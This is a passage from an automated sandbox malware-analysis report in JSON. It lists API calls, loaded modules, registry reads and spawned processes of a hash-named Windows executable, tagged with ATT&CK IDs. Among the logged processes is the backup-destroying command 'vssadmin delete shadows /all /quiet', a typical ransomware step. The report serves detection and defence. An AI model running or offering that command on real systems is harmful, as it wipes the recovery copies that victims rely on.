"relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter NtQuerySystemInformation (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter WNetCloseEnum (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter WNetOpenEnumW (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter WNetEnumResourceW (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter WSAStartup (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter socket (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter send (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter recv (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter connect (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter closesocket (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter gethostbyname (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter inet_addr (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter ntohl (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter htonl (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter htons (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter Wow64DisableWow64FsRedirection (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter NPGetCaps (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter NPGetUser (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter NPAddConnection (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter NPAddConnection3 (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter NPGetReconnectFlags (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter NPCancelConnection (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter NPGetConnection (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter NPGetConnection3 (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter NPGetUniversalName (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter NPOpenEnum (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter NPEnumResource (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter NPCloseEnum (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter NPGetResourceParent (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter NPGetResourceInformation (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter NPGetConnectionPerformance (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter NPFormatNetworkName (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidW (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter CreateWellKnownSid (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter RpcStringBindingComposeW (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter RpcBindingFromStringBindingW (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter RpcStringFreeW (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter RpcBindingSetAuthInfoExW (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter NdrClientCall2 (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter RpcBindingFree (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter CscNetApiGetInterface (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter NetApiBufferAllocate (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"GetProcAddress\" with a parameter NetApiBufferFree (UID: 00000000-00006140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005932)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter NtQueryInformationProcess (UID: 00000000-00005932)\n \"mode.com\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006132)\n \"mode.com\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00006132)\n \"mode.com\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00006132)\n \"mode.com\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006132)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004048)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00004048)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004048)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004048)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00004048)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004048)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004048)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004048)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00004048)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004048)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"0f00100044ea4000@Shell32.dll\"\n \"15001600c03e576a@advapi32.dll\"\n \"0e000f00703f576a@advapi32.dll\"\n \"0e000f00cc3f576a@advapi32.dll\"\n \"11001200b447576a@advapi32.dll\"\n \"110012004848576a@advapi32.dll\"\n \"120013008c48576a@advapi32.dll\"\n \"12001300e448576a@advapi32.dll\"\n \"14001500386e576a@advapi32.dll\"\n \"14001500506e576a@advapi32.dll\"\n \"14001500686e576a@advapi32.dll\"\n \"17001800806e576a@advapi32.dll\"\n \"0d000e00986e576a@advapi32.dll\"\n \"11001200a86e576a@advapi32.dll\"\n \"11001200bc6e576a@advapi32.dll\"\n \"0d000e003449576a@Shell32.dll\"\n \"0d000e00b049576a@Shell32.dll\"\n \"0f001000fc6f576a@advapi32.dll\"\n \"140015003c70576a@advapi32.dll\"\n \"140015005470576a@advapi32.dll\"\n \"0c000d009c70576a@advapi32.dll\"\n \"0c000d00ac70576a@advapi32.dll\"\n \"0e000f00bc70576a@advapi32.dll\"\n \"0e000f00cc70576a@advapi32.dll\"\n \"0b000c00dc70576a@advapi32.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" loaded module \"NTDLL.DLL\" at base 776e0000\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" loaded module \"MPR.DLL\" at base 72200000\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" loaded module \"WS2_32.DLL\" at base 76370000\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" loaded module \"KERNEL32.DLL\" at base 763b0000\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" loaded module \"RPCRT4.DLL\" at base 76090000\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75490000\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" loaded module \"USER32.DLL\" at base 77150000\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\DRPROV.DLL\" at base 73410000\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NTLANMAN.DLL\" at base 6a6b0000\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\DAVCLNT.DLL\" at base 6a690000\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" loaded module \"ADVAPI32.DLL\" at base 77340000\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77220000\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" loaded module \"WKSCLI.DLL\" at base 73e70000\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" loaded module \"CSCAPI.DLL\" at base 732d0000\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" loaded module \"NETUTILS.DLL\" at base 74220000\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" loaded module \"BROWCLI.DLL\" at base 68940000\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 77220000\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 77220000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71c70000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 763b0000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"cmd.exe\" loaded module \"NTDLL.DLL\" at base 776e0000\n \"mode.com\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 740f0000\n \"vssadmin.exe\" loaded module \"ADVAPI32.DLL\" at base 77340000\n \"vssadmin.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77220000\n \"vssadmin.exe\" loaded module \"CLBCATQ.DLL\" at base 772b0000\n \"vssadmin.exe\" loaded module \"CRYPTSP.DLL\" at base 74ff0000\n \"vssadmin.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74d80000\n \"vssadmin.exe\" loaded module \"KERNEL32.DLL\" at base 763b0000\n \"vssadmin.exe\" loaded module \"CRYPTBASE.DLL\" at base 754e0000\n \"vssadmin.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75580000\n \"vssadmin.exe\" loaded module \"%WINDIR%\\SYSTEM32\\VSS_PS.DLL\" at base 6cd40000\n \"vssadmin.exe\" loaded module \"OLE32.DLL\" at base 76210000\n \"vssadmin.exe\" loaded module \"OLEAUT32.DLL\" at base 774a0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"LoadLibrary\" with a parameter mpr.dll (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"LoadLibrary\" with a parameter ws2_32.dll (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\drprov.dll (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\ntlanman.dll (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\davclnt.dll (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"LoadLibrary\" with a parameter RPCRT4.dll (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"LoadLibrary\" with a parameter cscapi.dll (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"LoadLibrary\" with a parameter netutils.dll (UID: 00000000-00006140)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005932)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005932)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005932)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005932)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter NTDLL.DLL (UID: 00000000-00005932)\n \"mode.com\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006132)\n \"vssadmin.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004048)\n \"vssadmin.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004048)\n \"vssadmin.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004048)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\cmd.exe\" - (UID: 00000000-00006140)\n \"cmd.exe\" called \"CreateProcessW\" with parameter \"vssadmin delete shadows /all /quiet\" - (UID: 00000000-00005932)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76090000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76090000\n \"mode.com\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76090000\n \"vssadmin.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76090000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"cmd.exe\" (UID: 00000000-00005932)\n Spawned process \"mode.com\" with commandline \"mode con cp select=1251\" (UID: 00000000-00006132)\n Spawned process \"vssadmin.exe\" with commandline \"vssadmin delete shadows /all /quiet\" (UID: 00000000-00004048)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"cmd.exe\" (UID: 00000000-00005932)\n Spawned process \"mode.com\" with commandline \"mode con cp select=1251\" (UID: 00000000-00006132)\n Spawned process \"vssadmin.exe\" with commandline \"vssadmin delete shadows /all /quiet\" (UID: 00000000-00004048)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"mode.com\" (UID: 00000000-00006132) was launched with new environment variables: \"PROMPT=\"$P$G\"\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0\" was detected as 